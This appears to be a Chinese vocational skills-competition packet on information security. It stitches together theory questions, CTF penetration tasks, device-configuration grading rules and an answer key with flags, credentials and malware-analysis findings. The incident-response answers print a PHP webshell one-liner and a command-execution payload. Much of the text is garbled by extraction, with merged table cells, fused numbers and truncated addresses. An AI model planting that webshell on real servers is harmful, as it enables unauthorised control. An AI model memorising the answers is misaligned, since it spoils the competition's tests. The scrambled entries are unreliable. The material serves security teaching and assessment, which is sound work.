級別的有（A、TCSEC）B、IFTSECC、CCDBMS.PPD、GB17859-19995、安全的網(wǎng)絡(luò)通信必須考慮以下哪些方面？（A、加密算法）B、用于加密算法的秘密信息C、秘密信息的分布和共享D、使用加密算法和秘密信息以獲得安全服務所需的協(xié)議6、RC4加密算法被廣泛應用，包括（A、SSL/TLS）B、WEP協(xié)議C、WPA協(xié)議D、數(shù)字簽名7、VIM的工作模式，包括哪些？（A、命令模式）B、輸入模式C、高亮模式D、底行模式8、在反殺傷鏈中，情報可以分為那幾個層次？（）A、戰(zhàn)斗B、戰(zhàn)略C、戰(zhàn)區(qū)D、戰(zhàn)術(shù)9、我國現(xiàn)行的信息安全法律體系框架分為（A、信息安全相關(guān)的國家法律）三個層面。B、信息安全相關(guān)的行政法規(guī)和部分規(guī)章C、信息安全相關(guān)的地方法規(guī)/規(guī)章和行業(yè)規(guī)定D、信息安全相關(guān)的個人職業(yè)素養(yǎng)10、信息道德與信息安全問題一直存在的原因有（）。A、信息系統(tǒng)防護水平不高B、信息安全意識不強C、信息安全法律法規(guī)不完善D、網(wǎng)絡(luò)行為道德規(guī)范尚未形成全國職業(yè)院校技能大賽高等職業(yè)教育組信息安全管理與評估任務書模塊三網(wǎng)絡(luò)安全滲透、理論技能與職業(yè)素養(yǎng)1、比賽時間及注意事項本階段比賽時長為180分鐘，時間為9:00-12:00?！咀⒁馐马棥浚?）通過找到正確的flag值來獲取得分，flag統(tǒng)一格式如下所示：flag{<flag值>}這種格式在某些環(huán)境中可能被隱藏甚至混淆。所以，注意一些敏感信息并利用工具把它找出來。注：部分flag可能非統(tǒng)一格式，若存在此情況將會在題目描述中明確指出flag格式，請注意審題。（2）選手首先需要在U盤的根目錄下建立一個名為“BGWxx”的文件夾（xx用具體的工位號替代），請將賽題第三階段所完成的“信息安全管理與評估競賽答題卡-模塊三”答題文檔，放置在“BGWxx”文件夾中。例如：08工位，則需要在U盤根目錄下建立“BGW08”文件夾，請將第三階段所完成的“信息安全管理與評估競賽答題卡-模塊三”答題文檔，放置在“BGW08”文件夾中。2、競賽項目賽題本文件為信息安全管理與評估項目競賽-第三階段賽題，內(nèi)容包括：網(wǎng)絡(luò)安全滲透和理論技能與職業(yè)素養(yǎng)，其中理論技能與職業(yè)素養(yǎng)部分在平臺在線答題。3、介紹網(wǎng)絡(luò)安全滲透的目標是作為一名網(wǎng)絡(luò)安全專業(yè)人員在一個模擬的網(wǎng)絡(luò)環(huán)境中實現(xiàn)網(wǎng)絡(luò)安全滲透測試工作。本模塊要求參賽者作為攻擊方，運用所學的信息收集、漏洞發(fā)現(xiàn)、漏洞利用等技術(shù)完成對網(wǎng)絡(luò)的滲透測試；并且能夠通過各種信息安全相關(guān)技術(shù)分析獲1取存在的flag值。4、所需軟硬件設(shè)備和材料所有測試項目都可由參賽選手根據(jù)基礎(chǔ)設(shè)施列表中指定的設(shè)備和軟件完成。5、評分方案本測試項目模塊網(wǎng)絡(luò)安全滲透為300分,理論技能與職業(yè)素養(yǎng)100分。6、項目和任務描述在A集團的網(wǎng)絡(luò)中存在幾臺服務器，各服務器存在著不同業(yè)務服務。在網(wǎng)絡(luò)中存在著一定網(wǎng)絡(luò)安全隱患，請通過信息收集、漏洞挖掘等滲透測試技術(shù)，完成指定項目的滲透測試，在測試中獲取flag值。網(wǎng)絡(luò)環(huán)境參考樣例請查看《附錄A》。本模塊所使用到的滲透測試技術(shù)包含但不限于如下技術(shù)領(lǐng)域：數(shù)據(jù)庫攻擊枚舉攻擊權(quán)限提升攻擊基于應用系統(tǒng)的攻擊基于操作系統(tǒng)的攻擊逆向分析密碼學分析隱寫分析所有設(shè)備和服務器的IP地址請查看現(xiàn)場提供的設(shè)備列表。7、工作任務1.人力資源管理系統(tǒng)（45分）任務編號任務描述答案分值2請對門戶網(wǎng)站進行黑盒測試，利用漏洞找到flag1，并將flag1提交。flag1格式flag1{<flag值>}任務一15請對門戶網(wǎng)站進行黑盒測試，利用漏洞找到flag2，并將flag2提交。flag2格式flag2{<flag值>}任務二任務三1515請對門戶網(wǎng)站進行黑盒測試，利用漏洞找到flag3，并將flag3提交。flag3格式flag3{<flag值>}2.郵件系統(tǒng)（30分）任務編號任務描述答案分值請對辦公系統(tǒng)進行黑盒測試，利用漏洞找到flag1，并將flag1提交。flag1格式flag1{<flag值>}任務四任務五15請對辦公系統(tǒng)進行黑盒測試，利用漏洞找到flag2，并將flag2提交。flag2格式flag2{<flag值>}153.FTP服務器（165分）任務編號任務描述答案分值請獲取FTP服務器上task6目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}任務六任務七任務八任務九15請獲取FTP服務器上task7目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}152025請獲取FTP服務器上task8目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}請獲取FTP服務器上task9目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}3請獲取FTP服務器上task10目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}任務十20252025請獲取FTP服務器上task11目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}任務十一任務十二任務十三請獲取FTP服務器上task12目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}請獲取FTP服務器上task13目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}4.應用系統(tǒng)服務器（30分）任務編號任務描述答案分值應用系統(tǒng)服務器10000端口存在漏洞，獲取FTP服務器上task14目錄下的文件進行分析，請利用漏洞找到flag，并將flag提交。flag格式任務十四30flag{<flag值>}5.運維服務器（30分）任務編號任務描述答案分值運維服務器10001端口存在漏洞，獲取FTP服務器上task15目錄下的文件任務十五進行分析，請利用漏洞找到flag，并將flag提交。flag格式flag{<flag值>}304附錄A圖1網(wǎng)絡(luò)拓撲結(jié)構(gòu)圖51.根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址規(guī)劃表，對防火墻的名稱、各接口IP地址進行配置。共8分，每錯1處（行）扣1分，扣完為止。地址、安全域、接口（狀態(tài)為UP）、名稱都正確。2.根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址規(guī)劃表，對三層交換機的名稱進行配置，創(chuàng)建VLAN并將相應接口劃入VLAN,對各接口IP地址進行配置。20分，交換機名稱2分，vlan信息，IP地址，ipv6地址每錯1處扣1分，扣完為止，3.根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址規(guī)劃表，對無線交換機的名稱進行配置，創(chuàng)建VLAN并將相應接口劃入VLAN,對接口IP地址進行配置。10分，AC名稱2分，vlan信息，IP地址，IPv6地址每錯1處扣1分。4．根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址參數(shù)表，對BC的名稱、各接口IP地址進行配置。（8分）名稱2分，聚合端口2分，接口IP地址每個2分；5.根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址規(guī)劃表，對WEB應用防火墻的名稱、各接口IP地址進行配置。（4分）1.SW和AC開啟telnet登錄功能，telnet登錄賬戶僅包含“ABC4321”，密碼為明文“ABC4321”，采用telnet方式登錄設(shè)備時需要輸入enable密碼，密碼設(shè)置為明文“12345”。（4分）說明：admin賬號沒有刪除扣1分，ABC4321用戶的privilege值設(shè)置為15扣3分SWAC2.北京總公司和南京分公司租用了運營商兩條裸光纖，實現(xiàn)內(nèi)部辦公互通。一條裸光纖承載公司財務部門業(yè)務，一條裸光纖承載其他內(nèi)部業(yè)務。使用相關(guān)技術(shù)實現(xiàn)總公司財務段路由表與公司其它業(yè)務網(wǎng)段路由表隔離，財務業(yè)務位于VPN實例名稱CW內(nèi)，總公司財務和分公司財務能夠通信，財務部門總公司和分公司之間采用RIP路由實現(xiàn)互相訪問。（5分）若SW上showiproutevrfCW和AC上showiprouterip結(jié)果錯誤，本題0分。SW:AC:3.盡可能加大總公司核心和出口BC之間的帶寬。（4分）每設(shè)備2分，SW上看端口是否千兆全雙工及配置端口聚合；SWBC4.為防止終端產(chǎn)生MAC地址泛洪攻擊，請配置端口安全，已劃分VLAN41的端口最多學習到5個MAC地址，發(fā)生違規(guī)阻止后續(xù)違規(guī)流量通過，不影響已有流量并產(chǎn)生LOG日志；連接PC1的接口為專用接口，限定只允許PC1的MAC地址可以連接.（5分）7口配置2分，其它3個口1分，mac地址可變。5．在總部核心交換機端口ethernet1/0/6上，將屬于網(wǎng)段內(nèi)的報文帶寬限制為10M比特/秒，突發(fā)值設(shè)為4M字節(jié)，超過帶寬的該網(wǎng)段內(nèi)的報文一律丟棄。（5分）policy-map配置2分，其余每框1分，（acl名稱、class-map名稱、policy-map名字可變，嵌套關(guān)系需要對應）6.在SW上配置辦公用戶在上班時間（周一到周五9:00-17:00）禁止訪問外網(wǎng)，內(nèi)部網(wǎng)絡(luò)正常訪問。（2分）showclock時間需在開始競賽時間范圍內(nèi)，否則本題0分；7.總公司SW交換機模擬因特網(wǎng)交換機，通過某種技術(shù)實現(xiàn)本地路由和因特網(wǎng)路由進行隔離，因特網(wǎng)路由實例名internet。（2分）8.對SW上VLAN50開啟以下安全機制。業(yè)務內(nèi)部終端相互二層隔離；14口啟用環(huán)路檢測，環(huán)路檢測的時間間隔為10s，發(fā)現(xiàn)環(huán)路以后關(guān)閉該端口，恢復時間為30分鐘，如私設(shè)DHCP服務器關(guān)閉該端口，同時開啟防止ARP網(wǎng)關(guān)欺騙攻擊。6分，端口隔離1分，arp-guard配置正確1分，環(huán)路檢測配置正確2分、dhcpsnooping正確2分。9.配置使北京公司內(nèi)網(wǎng)用戶通過總公司出口BC訪問因特網(wǎng)，分公司內(nèi)網(wǎng)用戶通過分公司出口FW訪問因特網(wǎng)，要求總公司核心交換機9口VLAN41業(yè)務的用戶訪問因特網(wǎng)的流量往反數(shù)據(jù)流經(jīng)過防火墻在通過BC訪問因特網(wǎng);防火墻untrust1和trust1開啟安全防護，參數(shù)采用默認參數(shù)。要求有測試結(jié)果（14分）開啟安全防護2分，tracert結(jié)果12分，如果結(jié)果錯誤，本題0分；FW結(jié)果：10.為了防止DOS攻擊的發(fā)生，在總部交換機vlan50接口下對MAC、ARP、ND表項數(shù)量進行限制，具體要求為：最大可以學習20個動態(tài)MAC地址、20個動態(tài)ARP地址、50個NEIGHBOR表項。（3分）11.總公司和分公司今年進行IPv6試點，要求總公司和分公司銷售部門用戶能夠通過IPV6相互訪問，IPV6業(yè)務通過租用裸纖承載。實現(xiàn)分公司和總公司ipv6業(yè)務相互訪問；AC與SW之間配置靜態(tài)路由使VLAN50與VLAN60可以通過IPv6通信；VLAN40開啟IPV6，IPv6業(yè)務地址規(guī)劃如下：（8分）下一跳ipv6地址需為fe80開頭，否則扣4分，ping6結(jié)果錯誤本題0分；SW：AC：12.在總公司核心交換機SW配置IPv6地址，開啟路由公告功能，路由器公告的生存期為2小時，確保銷售部門的IPv6終端可以通過DHCPSERVER獲取IPv6地址，在SW上開啟IPV6dhcpserver功能,ipv6地址范圍2001:da8:50::2-2001:da8:50::100。（6分）DHCPv6配置正確得1分，開啟路由公告及公告生存期正確得1分，結(jié)果正確4分，如無結(jié)果或結(jié)果錯誤，本題0分；（結(jié)果中的DUID值為隨機的，可與本文檔中不一致）結(jié)果：13．在南京分公司上配置IPv6地址，使用相關(guān)特性實現(xiàn)銷售部的IPv6終端可自動從網(wǎng)關(guān)處獲得IPv6無狀態(tài)地址。（6分）能獲取到隨機分配得ipv6地址得6分，須有臨時IPV6地址；14.SW與AC，AC與FW之間配置OSPFarea0開啟基于鏈路的MD5認證，密鑰自定義，傳播訪問INTERNET默認路由，讓總公司和分公司內(nèi)網(wǎng)用戶能夠相互訪問包含AC上loopback1地址；總公司SW和BC之間運行靜態(tài)路由協(xié)議。18分，開啟MD5認證3分，showiprouteospf結(jié)果正確得12分，SW和BC配置靜態(tài)路由，3分；FWSWACBC15.分公司銷售部門通過防火墻上的DHCPSERVER獲取IP地址，serverIP地址為54，地址池范圍0-00，dns-server。（5分）防火墻上showdhcp-serverbindingloopback_addrpool已經(jīng)分配IP地址得分，否則不得分。16.如果SW的11端口的收包速率超過30000則關(guān)閉此端口，恢復時間5分鐘；為了更好地提高數(shù)據(jù)轉(zhuǎn)發(fā)的性能，SW交換中的數(shù)據(jù)包大小指定為1600字節(jié)；（3分）17.為實現(xiàn)對防火墻的安全管理，在防火墻FW的Trust安全域開啟PING,HTTP，telnet，SNMP功能，Untrust安全域開啟SSH、HTTPS功能，snmp服務器地址：00，團體字：skills（4分）18.在分部防火墻上配置，分部VLAN業(yè)務用戶通過防火墻訪問Internet時，復用公網(wǎng)IP：、；保證每一個源IP產(chǎn)生的所有會話將被映射到同一個固定的IP地址，當有流量匹配本地址轉(zhuǎn)換規(guī)則時產(chǎn)生日志信息，將匹配的日志發(fā)送至0的UDP2000端口；（5分）安全策略配置正確2分，NAT，地址簿，日志配置各1分；19.遠程移動辦公用戶通過專線方式接入分公司網(wǎng)絡(luò)，在防火墻FW上配置，采用SSL方式實現(xiàn)僅允許對內(nèi)網(wǎng)VLAN61的訪問，端口號使用4455，用戶名密碼均為ABC4321，地址池參見地址表；（8分）VPN連接正確得4分，ping通得4分。若ping不通本題0分；20.分公司部署了一臺WEB服務器ip為0，接在防火墻的DMZ區(qū)域為外網(wǎng)用戶提供web服務，要求內(nèi)網(wǎng)用戶能,ping通web服務器和訪問服務器上的web服務（端口80）和遠程管理服務器（端口3389），外網(wǎng)用戶只能訪問通過防火墻外網(wǎng)地址訪問服務器web服務。（6分）目的nat2分、策略4分21.為了安全考慮，無線用戶移動性較強，訪問因特網(wǎng)時需要在BC上開啟web認證，采用本地認證，密碼賬號都為web4321。（5分）認證成功3分，過程2分；22.由于分公司到因特網(wǎng)鏈路帶寬比較低，出口只有200M帶寬，需要在防火墻配置iQOS，系統(tǒng)中P2P總的流量不能超過100M，同時限制每用戶最大下載帶寬為2M，上傳為1M，優(yōu)先保障HTTP應用，為http預留100M帶寬。（6分）每條qos策略3分；23.為凈化上網(wǎng)環(huán)境，要求在防火墻FW做相關(guān)配置，禁止無線用戶周一至周五工作時間9：00-18：00的郵件內(nèi)容中含有“病毒”、“賭博”的內(nèi)容，且記錄日志。（5分）每錯1處扣1分，扣完為止；24.由于總公司無線是通過分公司的無線控制器統(tǒng)一管理，為了防止專線故障導致無線不能使用，總公司和分公司使用互聯(lián)網(wǎng)作為總公司無線ap和AC相互訪問的備份鏈路。FW和BC之間通過IPSEC技術(shù)實現(xiàn)AP管理段與無線AC之間聯(lián)通，具體要求為采用預共享密碼為ABC4321，IKE階段1采用DH組1、3DES和MD5加密方，IKE階段2采用ESP-3DES，MD5。15分，結(jié)果錯誤本題0分；FWBC25.總公司用戶，通過BC訪問因特網(wǎng)，BC采用路由方式，在BC上做相關(guān)配置，讓總公司內(nèi)網(wǎng)用戶（不包含財務）通過BC外網(wǎng)口ip訪問因特網(wǎng)。3分；26.在BC上配置PPTPvpn讓外網(wǎng)用戶能夠通過PPTPvpn訪問總公司SW上內(nèi)網(wǎng)地址，用戶名為test，密碼test23。3分，結(jié)果錯誤0分；27.為了提高分公司出口帶寬，盡可能加大分公司AC和出口FW之間帶寬。3分，每框1分；FW:AC:28.在BC上配置url過濾策略，禁止總公司內(nèi)網(wǎng)用戶在周一到周五的早上8點到晚上18點訪問外網(wǎng)。3分；配置2分，時間計劃和地址簿各0.5分；29.在BC上開啟IPS策略，對總公司內(nèi)網(wǎng)用戶訪問外網(wǎng)數(shù)據(jù)進行IPS防護，保護服務器、客戶端和惡意軟件檢測，檢測到攻擊后進行拒絕并記錄日志。3分；30.總公司出口帶寬較低，總帶寬只有200M，為了防止內(nèi)網(wǎng)用戶使用p2p迅雷下載占用大量帶寬需要限制內(nèi)部員工使用P2P工具下載的流量，最大上下行帶寬都為50M，以免P2P流量占用太多的出口網(wǎng)絡(luò)帶寬，啟用阻斷記錄。4分，線路帶寬配置1分，規(guī)則配置3分；31.通過BC設(shè)置總公司用戶在上班時間周一到周五9:00到18:00禁止玩游戲,并啟用阻斷記錄。4分，每框2分32.限制總公司內(nèi)網(wǎng)用戶訪問因特網(wǎng)web視頻和即時通信下行最大帶寬為20M，上傳為10M，啟用阻斷記錄；4分，即時通訊顯示“ALL”或者“397種”均可；33.BC上開啟黑名單告警功能，級別為預警狀態(tài)，并進行郵件告警和記錄日志，發(fā)現(xiàn)cpu使用率大于80%，內(nèi)存使用大于80%時進行郵件告警并記錄日志，級別為嚴重狀態(tài)。發(fā)送郵件地址為123@163.com，接收郵件為133139123456@163.com。4分34.分公司內(nèi)部有一臺網(wǎng)站服務器直連到WAF，地址是0，端口是8080，配置將服務訪問日志、WEB防護日志、服務監(jiān)控日志信息發(fā)送syslog日志服務器，IP地址是，UDP的514端口;4分(注：日志服務器狀態(tài)不啟用不給分)35.在分公司的WAF上配置，對會話安全進行防護，開啟Cookie加固和加密。3分36.編輯防護策略，定義HTTP請求最大長度為1024，防止緩沖區(qū)溢出攻擊。3分37.為防止暴力破解網(wǎng)站服務器，在WAF上配置對應的防護策略進行限速防護，名稱為“防暴力破解”，限速頻率為每秒1次，嚴重級別為高級，記錄日志；3分38.WAF上配置阻止用戶上傳ZIP、DOC、JPG、RAR格式文件，規(guī)則名稱為“阻止文件上傳”;4分，規(guī)則應用1分，配置3分；39.WAF上配置對應防護規(guī)則，規(guī)則名稱為“HTTP特征防護”要求對SQL注入、跨站腳本攻擊XSS、信息泄露、防爬蟲、惡意攻擊等進行防護，一經(jīng)發(fā)現(xiàn)立即阻斷并發(fā)送郵件報警及記錄日志。4分40.WAF上配置對“”，開啟弱密碼檢測，名稱配置為“弱密碼檢測”。3分41.WAF上配置防跨站防護功能，規(guī)則名稱為“防跨站防護”保護““不受攻擊，處理動作設(shè)置為阻斷，請求方法為GET,POST方式；3分42.由于公司IP地址為統(tǒng)一規(guī)劃，原有無線網(wǎng)段IP地址為/22,為了避免地址浪費需要對ip地址進行重新分配；要求如下：未來公司預計部署ap50臺；辦公無線用戶vlan10預計300人，來賓用戶vlan20以及不超過30人；6分，每框2分；43.AC上配置DHCP，管理VLAN為VLAN100,為AP下發(fā)管理地址，網(wǎng)段中第一個可用地址為AP管理地址，最后一個可用地址為網(wǎng)關(guān)地址，AP通過DHCPopion43注冊，AC地址為loopback1地址；為無線用戶VLAN10,20下發(fā)IP地址，最后一個可用地址為網(wǎng)關(guān)；6分，開啟DHCP服務1分，DHCP地址池配置2分，無線IP地址配置1分，AP注冊成功2分，若AP注冊不成功，本題0分；AC44.在NETWORK下配置SSID，需求如下：NETWORK1下設(shè)置SSIDABC4321，VLAN10，加密模式為wpa-personal,其口令為43214321；4分45.NETWORK2下設(shè)置SSIDGUEST，VLAN20不進行認證加密,做相應配置隱藏該SSID；3分，每條1分；46.NETWORK2開啟內(nèi)置portal+本地認證的認證方式，賬號為test密碼為test4321;6分，配置2分，有客戶端認證結(jié)果4分，無結(jié)果或結(jié)果錯誤本題0分；47.配置SSIDGUEST每天早上0點到6點禁止終端接入;GUSET最多接入10個用戶，并對GUEST網(wǎng)絡(luò)進行流控，上行1M，下行2M；配置所有無線接入用戶相互隔離；6分，限時配置1分，qos配置3分，最大用戶1分，用戶隔離1分。48.配置當AP上線，如果AC中儲存的Image版本和AP的Image版本號不同時，會觸發(fā)AP自動升級；配置AP發(fā)送向無線終端表明AP存在的幀時間間隔為2秒；配置AP失敗狀態(tài)超時時間及探測到的客戶端狀態(tài)超時時間都為2小時；4分；ap自動升級1分，失敗狀態(tài)超時時間1分，客戶端狀態(tài)超時1分，幀間隔1分；49.為了提高wifi用戶體驗感，拒絕弱信號終端接入，設(shè)置閾值低于50的終端接入無線信號；為防止非法AP假冒合法SSID，開啟AP威脅檢測功能；4分，信號值設(shè)置2分，AP威脅檢測2分；50.通過配置防止多AP和AC相連時過多的安全認證連接而消耗CPU資源，檢測到AP與AC在10分鐘內(nèi)建立連接5次就不再允許繼續(xù)連接，兩小時后恢復正常。3分參考答案第一部分網(wǎng)絡(luò)安全事件響應任務1：CentOS服務器應急響應（70分）A集團的應用服務器被黑客入侵，該服務器的Web應用系統(tǒng)被上傳惡意軟件，系統(tǒng)文件被惡意軟件破壞，您的團隊需要幫助該公司追蹤此網(wǎng)絡(luò)攻擊的來源，在服務器上進行全面的檢查，包括日志信息、進程信息、系統(tǒng)文件、惡意文件等，從而分析黑客的攻擊行為，發(fā)現(xiàn)系統(tǒng)中的漏洞，并對發(fā)現(xiàn)的漏洞進行修復。本任務素材清單：CentOS服務器虛擬機。受攻擊的Server服務器已整體打包成虛擬機文件保存，請選手自行導入分析。用戶名：root，密碼：nanyidian..注意：Server服務器的基本配置參見附錄，若題目中未明確規(guī)定，請使用默認配置。請按要求完成該部分的工作任務。任務1：CentOS服務器應急響應序號任務內(nèi)容答案請?zhí)峤痪W(wǎng)站管理員的用戶名和密碼12manager1/863211footer.php攻擊者通過應用后臺修改了某文件獲取了服務器權(quán)限，請?zhí)峤辉撐募奈募粽咄ㄟ^篡改文件后，可通過該網(wǎng)站官網(wǎng)進行任意未授權(quán)命令執(zhí)行，請?zhí)峤焕迷撃抉R執(zhí)行phpinfo的payload,例如:/shell.php?cmd=phpinfo();34/?pass=phpinfo();攻擊者進一步留下的免殺的webshell在網(wǎng)站中，請?zhí)峤辉搒hell的原文最簡式，<?phpeval($_POST['loveU']);?>例如：<?php...?>攻擊者修改了某文件，導致webshell刪除后會自動生成，請?zhí)峤辉撐募慕^對路徑56/etc/crontab請?zhí)峤痪W(wǎng)站服務連接數(shù)據(jù)庫使用的數(shù)據(jù)庫賬號和密碼wordpress/wordpress-pass請?zhí)峤还粽咴跀?shù)據(jù)庫中留下的信息，格式為：flag{...}7flag{th1s_ls_fl44444g1}第二部分數(shù)字取證調(diào)查任務2：基于Windows的內(nèi)存取證（40分）A集團某服務器系統(tǒng)感染惡意程序，導致系統(tǒng)關(guān)鍵文件被破壞，請分析A集團提供的系統(tǒng)鏡像和內(nèi)存鏡像，找到系統(tǒng)鏡像中的惡意軟件，分析惡意軟件行為。本任務素材清單：內(nèi)存鏡像（*.raw）。請按要求完成該部分的工作任務。任務2：基于Windows的內(nèi)存取證序號任務內(nèi)容答案請指出內(nèi)存中疑似惡意進程12.hack.ex請指出該員工使用的公司OA平臺的密碼liuling7541黑客傳入一個木馬文件并做了權(quán)限維持，請問木馬文件名是什么34h4ck3d!請?zhí)峤辉撚嬎銠C中記錄的重要聯(lián)系人的家庭住址秋水省雁蕩市碧波區(qū)千嶼山莊1號任務3：通信數(shù)據(jù)分析取證（50分）A集團的網(wǎng)絡(luò)安全監(jiān)控系統(tǒng)發(fā)現(xiàn)惡意份子正在實施高級可持續(xù)攻擊（APT），并抓取了部分可疑流量包。請您根據(jù)捕捉到的流量包，搜尋出網(wǎng)絡(luò)攻擊線索，分解出隱藏的惡意程序，并分析惡意程序的行為。本任務素材清單：捕獲的通信數(shù)據(jù)文件。請按要求完成該部分的工作任務。任務3：通信數(shù)據(jù)分析取證序號任務內(nèi)容答案請?zhí)峤痪W(wǎng)絡(luò)數(shù)據(jù)包中傳輸?shù)目蓤?zhí)行的惡意程序文件名1happy.docx請?zhí)峤辉搻阂獬绦蛳螺d載荷的ip和端口23454:9090請?zhí)峤粣阂獬绦蜉d荷讀取的本地文件名（含路徑）c:\tmp\secret.txt請?zhí)峤粣阂獬绦蜃x取的本地文件的內(nèi)容f6dff95c2ec911ebbede0cdd24f6bd6d任務4：基于Linux計算機單機取證（60分）對給定取證鏡像文件進行分析，搜尋證據(jù)關(guān)鍵字（線索關(guān)鍵字為“evidence1”、“evidence2”、……、“evidence10”，有文本形式也有圖片形式，不區(qū)分大小寫），請?zhí)崛『凸潭ū荣愐蟮臉说淖C據(jù)文件，并按樣例的格式要求填寫相關(guān)信息，證據(jù)文件在總文件數(shù)中所占比例不低于15%。取證的信息可能隱藏在正常的、已刪除的或受損的文件中，您可能需要運用編碼轉(zhuǎn)換技術(shù)、加解密技術(shù)、隱寫技術(shù)、數(shù)據(jù)恢復技術(shù)，還需要熟悉常用的文件格式（如辦公文檔、壓縮文檔、圖片等）。本任務素材清單：取證鏡像文件。請按要求完成該部分的工作任務。任務4：基于Linux計算機單機取證在取證鏡像中的文件名證據(jù)編號鏡像中原文件Hash碼（MD5，不區(qū)分大小寫）evidence1evidence2evidence3evidence4evidence5evidence6evidence7evidence8lili.gif900EA4D6698613298AEDE3DF36BA92B8FB99F9C2C207281E0CD7A29E976F1CDD2437FD58491FBCA528B49B4AC70894256B8DFFA9586C6D99B559C79A2105D855509998568BEAFA5D6C950493220F783D68BB1999633DBB422C164AA4F664897B9CEADE34EB17E135E24CB7937A600ADC45EB5309A774F1DB0B3B996584EB4326qwe.dlldudu.xlsxvbdg.docxfour_Digit.jpgjiko.pyINbud.bmp0N0n.jpgevidence9evidence10buhu900AA268F3BF119233CB2F05D5B8FAFDF70BBEC2D9AC8A4658D262D2695824EAyiji.doc第三部分應用程序安全任務5：Android惡意程序分析（50分）A集團發(fā)現(xiàn)其發(fā)布的Android移動應用程序文件遭到非法篡改，您的團隊需要協(xié)助A集團對該惡意程序樣本進行逆向分析、對其攻擊/破壞的行為進行調(diào)查取證。本任務素材清單：Android移動應用程序文件。請按要求完成該部分的工作任務。任務5：Android惡意程序分析序號任務內(nèi)容答案http://wwww.somethingOrN/r/r/r/r1234提交素材中的惡意應用回傳數(shù)據(jù)的url地址提交素材中的惡意代碼保存數(shù)據(jù)文件名稱（含路徑）提交素材中的惡意行為發(fā)起的dex的SHA1簽名值描述素材中惡意代碼的行為/storage/emulated/0/Android/data/com.example.myapplication/files/.a/.abb5adc13d8cedb7b34187d8293a92a5ee02996b0讀取并刪除通訊錄聯(lián)系人數(shù)據(jù)，加密后寫入本地文件，并上傳到指定網(wǎng)址。任務6：C代碼審計（30分）代碼審計是指對源代碼進行檢查，尋找代碼存在的脆弱性，這是一項需要多方面技能的技術(shù)。作為一項軟件安全檢查工作，代碼安全審查是非常重要的一部分，因為大部分代碼從語法和語義上來說是正確的，但存在著可能被利用的安全漏洞，你必須依賴你的知識和經(jīng)驗來完成這項工作。本任務素材清單：C源代碼文件。請按要求完成該部分的工作任務。任務6：C代碼審計序號任務內(nèi)容答案請指出本段代碼存在什么漏洞緩沖區(qū)溢出12請指出存在漏洞的函數(shù)名稱，例如：scanffgets全國職業(yè)院校技能大賽高職組信息安全管理與評估（賽項）評分標準第三階段奪旗挑戰(zhàn)CTF（網(wǎng)絡(luò)安全滲透）競賽項目賽題本文件為信息安全管理與評估項目競賽-第三階段賽題，內(nèi)容包括：奪旗挑戰(zhàn)CTF（網(wǎng)絡(luò)安全滲透）。介紹網(wǎng)絡(luò)安全滲透的目標是作為一名網(wǎng)絡(luò)安全專業(yè)人員在一個模擬的網(wǎng)絡(luò)環(huán)境中實現(xiàn)網(wǎng)絡(luò)安全滲透測試工作。本模塊要求參賽者作為攻擊方，運用所學的信息收集、漏洞發(fā)現(xiàn)、漏洞利用等技術(shù)完成對網(wǎng)絡(luò)的滲透測試；并且能夠通過各種信息安全相關(guān)技術(shù)分析獲取存在的flag值。所需的設(shè)施設(shè)備和材料所有測試項目都可以由參賽選手根據(jù)基礎(chǔ)設(shè)施列表中指定的設(shè)備和軟件完成。評分方案本測試項目模塊分數(shù)為300分。項目和任務描述在A集團的網(wǎng)絡(luò)中存在幾臺服務器，各服務器存在著不同業(yè)務服務。在網(wǎng)絡(luò)中存在著一定網(wǎng)絡(luò)安全隱患，請通過信息收集、漏洞挖掘等滲透測試技術(shù)，完成指定項目的滲透測試，在測試中獲取flag值。網(wǎng)絡(luò)環(huán)境參考樣例請查看附錄A。本模塊所使用到的滲透測試技術(shù)包含但不限于如下技術(shù)領(lǐng)域：?數(shù)據(jù)庫攻擊?枚舉攻擊

?權(quán)限提升攻擊?基于應用系統(tǒng)的攻擊?基于操作系統(tǒng)的攻擊?逆向分析?密碼學分析?隱寫分析所有設(shè)備和服務器的IP地址請查看現(xiàn)場提供的設(shè)備列表。特別提醒通過找到正確的flag值來獲取得分，flag統(tǒng)一格式如下所示：flag{<flag值>}這種格式在某些環(huán)境中可能被隱藏甚至混淆。所以，注意一些敏感信息并利用工具把它找出來。注：部分flag可能非統(tǒng)一格式，若存在此情況將會在題目描述中明確指出flag格式，請注意審題。工作任務一、人力資源管理系統(tǒng)（45分）任務編號任務一任務描述答案分值請對人力資源管理系統(tǒng)進行黑盒測試，利用漏洞找到flag1，并將flag1提交。flag1格式flag1{<flag值>}flag1{4a585509-abfe-4f32-961f-076745205597}15請對人力資源管理系統(tǒng)進行黑盒測試，利用漏洞找到flag2，并將flag2提交。flag2格式flag2{<flag值>}flag2{bfbf52fe-2504-4395-b6ba-523c8d6403c0}任務二15請對人力資源管理系統(tǒng)進行黑盒測試，利用漏洞找到flag3，并將flag3提交。flag3格式flag3{<flag值>}flag3{488ea2a5-8fb9-472d-be31-f955de615ce4}任務三15二、郵件系統(tǒng)（30分）任務編號任務描述答案分值請對郵件系統(tǒng)進行黑盒測試，利用漏洞找到flag1，并將flag1提交。flag1格式flag1{<flag值>}flag1{19d299cb-3935-46ae-94fb-d8c936881295}任務四任務五15請對郵件系統(tǒng)進行黑盒測試，利用漏洞找到flag2，并將flag2提交。flag2格式flag2{<flag值>}flag2{44cae0f5-c9fe-4f26-8eb1-45f735dd9846}15三、FTP服務器（165分）任務編號任務描述答案分值請獲取FTP服務器上task6目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{5BC925649CB0188F52E617D70929191C}任務六15請獲取FTP服務器上task7目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>